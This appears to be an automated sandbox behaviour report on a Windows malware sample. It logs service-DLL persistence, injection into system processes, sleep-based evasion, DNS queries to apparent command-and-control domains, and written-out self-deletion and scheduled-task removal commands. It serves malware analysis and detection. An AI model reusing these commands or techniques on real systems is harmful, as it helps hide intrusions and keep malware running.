      Source: C:\Windows\SysWOW64\svchost.exeExecutable created and started: C:\Windows\SysWOW64\dllhostex.exeJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FunctionProtocolHost\Parameters ServiceDll C:\Windows\system32\FunctionProtocolHost.dllJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\cnli-0.dllJump to dropped file
      Source: C:\Users\user\Desktop\wuauclt.exeFile created: C:\Windows\SysWOW64\FunctionProtocolHost.dllJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\WUDHostServices.exeJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\adfw.dllJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\dllhostex.exeJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeFile created: C:\Windows\NetworkDistribution\adfw-2.dllJump to dropped file
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile created: C:\Windows\NetworkDistribution\cnli-1.dllJump to dropped file

      Boot Survival

      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"
      Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FunctionProtocolHostJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FunctionProtocolHostJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257040 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00257040

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\Desktop\wuauclt.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0399A82A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0399A82A
      Source: C:\Windows\SysWOW64\dllhostex.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeStalling execution: Execution stalls by calling Sleep
      Source: C:\Windows\SysWOW64\dllhost.exeStalling execution: Execution stalls by calling Sleep
      Source: C:\Windows\SysWOW64\ctfmon.exeStalling execution: Execution stalls by calling Sleep
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_009693E015_2_009693E0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA93E021_2_02FA93E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_028693E023_2_028693E0
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E093E024_2_02E093E0
      Source: C:\Windows\SysWOW64\dllhostex.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5224Thread sleep count: 44 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5252Thread sleep time: -115000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5764Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5716Thread sleep time: -450000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5648Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 1572Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5628Thread sleep time: -300000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5628Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5648Thread sleep time: -7200000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5648Thread sleep time: -14400000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 1572Thread sleep time: -9000000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588Thread sleep time: -45000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5588Thread sleep time: -80000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5624Thread sleep count: 55 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 4700Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 3532Thread sleep time: -5400000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 3532Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhostex.exe TID: 4204Thread sleep count: 621 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\dllhostex.exe TID: 4204Thread sleep time: -124200s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 2204Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6952Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 6952Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 5172Thread sleep time: -420000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 6624Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 6624Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 1928Thread sleep time: -480000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 5972Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exe TID: 5972Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 2792Thread sleep time: -480000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 6836Thread sleep time: -6300000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5304Thread sleep time: -660000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 4872Thread sleep time: -6300000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 5752Thread sleep time: -480000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 5780Thread sleep time: -5400000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 5780Thread sleep time: -900000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 1548Thread sleep time: -600000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 6232Thread sleep time: -5400000s >= -30000s
      Source: C:\Windows\SysWOW64\ctfmon.exe TID: 6232Thread sleep time: -900000s >= -30000s
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5892Thread sleep time: -600000s >= -30000s
      Source: C:\Windows\SysWOW64\svchost.exe TID: 5956Thread sleep time: -5400000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7192Thread sleep time: -90000s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\dllhostex.exeWindow / User API: threadDelayed 621Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\cnli-0.dllJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\adfw.dllJump to dropped file
      Source: C:\Windows\SysWOW64\ctfmon.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\adfw-2.dllJump to dropped file
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeDropped PE file which has not been started: C:\Windows\NetworkDistribution\cnli-1.dllJump to dropped file
      Source: C:\Windows\SysWOW64\dllhost.exeEvaded block: after key decision
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: WSAStartup,GetAdaptersInfo,0_2_00255F70
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 30000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 120000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 300000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 1800000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 60000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 60000
      Source: C:\Windows\SysWOW64\ctfmon.exeThread delayed: delay time: 900000
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 60000
      Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 900000
      Source: SearchProtocolHost.exe, 00000015.00000002.723695954.00000000033F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
      Source: ctfmon.exe, 0000000F.00000002.705657892.0000000000E07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03997780 GetSystemInfo,2_2_03997780
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025F89F FindFirstFileExA,0_2_0025F89F
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097B9D3 FindFirstFileExA,15_2_0097B9D3
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0096AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,15_2_0096AA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FAAA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,21_2_02FAAA40
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FBB9D3 FindFirstFileExA,21_2_02FBB9D3
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0286AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,23_2_0286AA40
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287B9D3 FindFirstFileExA,23_2_0287B9D3
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E0AA40 wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,FindNextFileW,FindClose,24_2_02E0AA40
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1B9D3 FindFirstFileExA,24_2_02E1B9D3
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD54D40 VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,2_2_6FD54D40
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025C90E mov eax, dword ptr fs:[00000030h]0_2_0025C90E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD595B8 mov eax, dword ptr fs:[00000030h]2_2_6FD595B8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039A258D mov eax, dword ptr fs:[00000030h]2_2_039A258D
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_0097657D mov eax, dword ptr fs:[00000030h]15_2_0097657D
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01369F60 mov eax, dword ptr fs:[00000030h]16_2_01369F60
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01369FA5 mov eax, dword ptr fs:[00000030h]16_2_01369FA5
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0136324D mov eax, dword ptr fs:[00000030h]16_2_0136324D
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB657D mov eax, dword ptr fs:[00000030h]21_2_02FB657D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0287657D mov eax, dword ptr fs:[00000030h]23_2_0287657D
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E1657D mov eax, dword ptr fs:[00000030h]24_2_02E1657D
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0025B888 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0025B888
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_0026127C GetProcessHeap,0_2_0026127C
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257AAE SetUnhandledExceptionFilter,0_2_00257AAE
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002570EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002570EE
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257993 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00257993
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD5A0CA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6FD5A0CA
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD56452 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6FD56452
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD5606B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6FD5606B
      Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03998A9B DeleteFileA,Sleep,IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_03998A9B
      Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039987E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_039987E0
      Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039A146B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_039A146B
      Source: C:\Windows\SysWOW64\ctfmon.exe Code function: 15_2_009693E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,15_2_009693E0
      Source: C:\Windows\SysWOW64\ctfmon.exe Code function: 15_2_009715D6 SetUnhandledExceptionFilter,15_2_009715D6
      Source: C:\Windows\SysWOW64\ctfmon.exe Code function: 15_2_00975A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00975A46
      Source: C:\Windows\SysWOW64\ctfmon.exe Code function: 15_2_00971477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00971477
      Source: C:\Windows\SysWOW64\ctfmon.exe Code function: 15_2_00970D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00970D6D
      Source: C:\Windows\SysWOW64\dllhostex.exe Code function: 16_2_01353DB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_01353DB4
      Source: C:\Windows\SysWOW64\dllhostex.exe Code function: 16_2_0135B5DC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0135B5DC
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 21_2_02FA93E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,21_2_02FA93E0
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 21_2_02FB15D6 SetUnhandledExceptionFilter,21_2_02FB15D6
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 21_2_02FB5A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_02FB5A46
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 21_2_02FB1477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_02FB1477
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe Code function: 21_2_02FB0D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_02FB0D6D
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_028693E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,23_2_028693E0
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_02875A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_02875A46
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_02871477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_02871477
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_028715D6 SetUnhandledExceptionFilter,23_2_028715D6
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_02870D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_02870D6D
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 24_2_02E093E0 FreeConsole,SetUnhandledExceptionFilter,Sleep,Sleep,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,GetTickCount,GetTickCount,GetTickCount,Sleep,GetTickCount,ExitProcess,24_2_02E093E0
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 24_2_02E15A46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_02E15A46
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 24_2_02E11477 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_02E11477
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 24_2_02E115D6 SetUnhandledExceptionFilter,24_2_02E115D6
      Source: C:\Windows\SysWOW64\dllhost.exe Code function: 24_2_02E10D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_02E10D6D

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\SysWOW64\svchost.exe Domain query: date.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exe Domain query: r.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exe Domain query: load.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exe Domain query: bk.estonine.com
      Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: C:\Windows\SysWOW64\ctfmon.exe base: 960000 protect: page execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 2FA0000 protect: page execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2860000 protect: page execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: C:\Windows\SysWOW64\dllhost.exe base: 2E00000 protect: page execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: C:\Windows\SysWOW64\ctfmon.exe base: 750000 protect: page execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: C:\Windows\SysWOW64\ctfmon.exe base: 790000 protect: page execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 960000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 2FA0000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\System32\conhost.exe base: 2860000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2E00000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 4E0000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 8A0000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 750000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 790000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 820000 value starts with: 4D5A
      Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Windows\SysWOW64\FunctionProtocolHost.dll
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 960000
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: B3B008
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 2FA0000
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\SearchProtocolHost.exe base: 3071008
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\System32\conhost.exe base: 2860000
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\System32\conhost.exe base: 278C008
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2E00000
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\dllhost.exe base: 2C5A008
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 750000
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 878008
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 790000
      Source: C:\Windows\SysWOW64\svchost.exe Memory written: C:\Windows\SysWOW64\ctfmon.exe base: 80E008
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\schtasks.exe /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /F
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\system32\searchprotocolhost.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exe Process created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Windows\SysWOW64\svchost.exe Code function: IsValidCodePage,GetLocaleInfoW,2_2_039AF3D6
      Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_039AFB3A
      Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,2_2_039AFA11
      Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,2_2_039AFA08
      Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,2_2_039A51B5
      Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW,2_2_039AF734
      Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW,2_2_039AF699
      Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW,2_2_039AF64E
      Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,2_2_039AF5A5
      Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW,2_2_039A4DF0
      Source: C:\Windows\SysWOW64\svchost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_039AFD0E
      Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,2_2_039AFC41
      Source: C:\Users\user\Desktop\wuauclt.exe Code function: 0_2_00257BDE cpuid 0_2_00257BDE
      Source: C:\Users\user\Desktop\wuauclt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
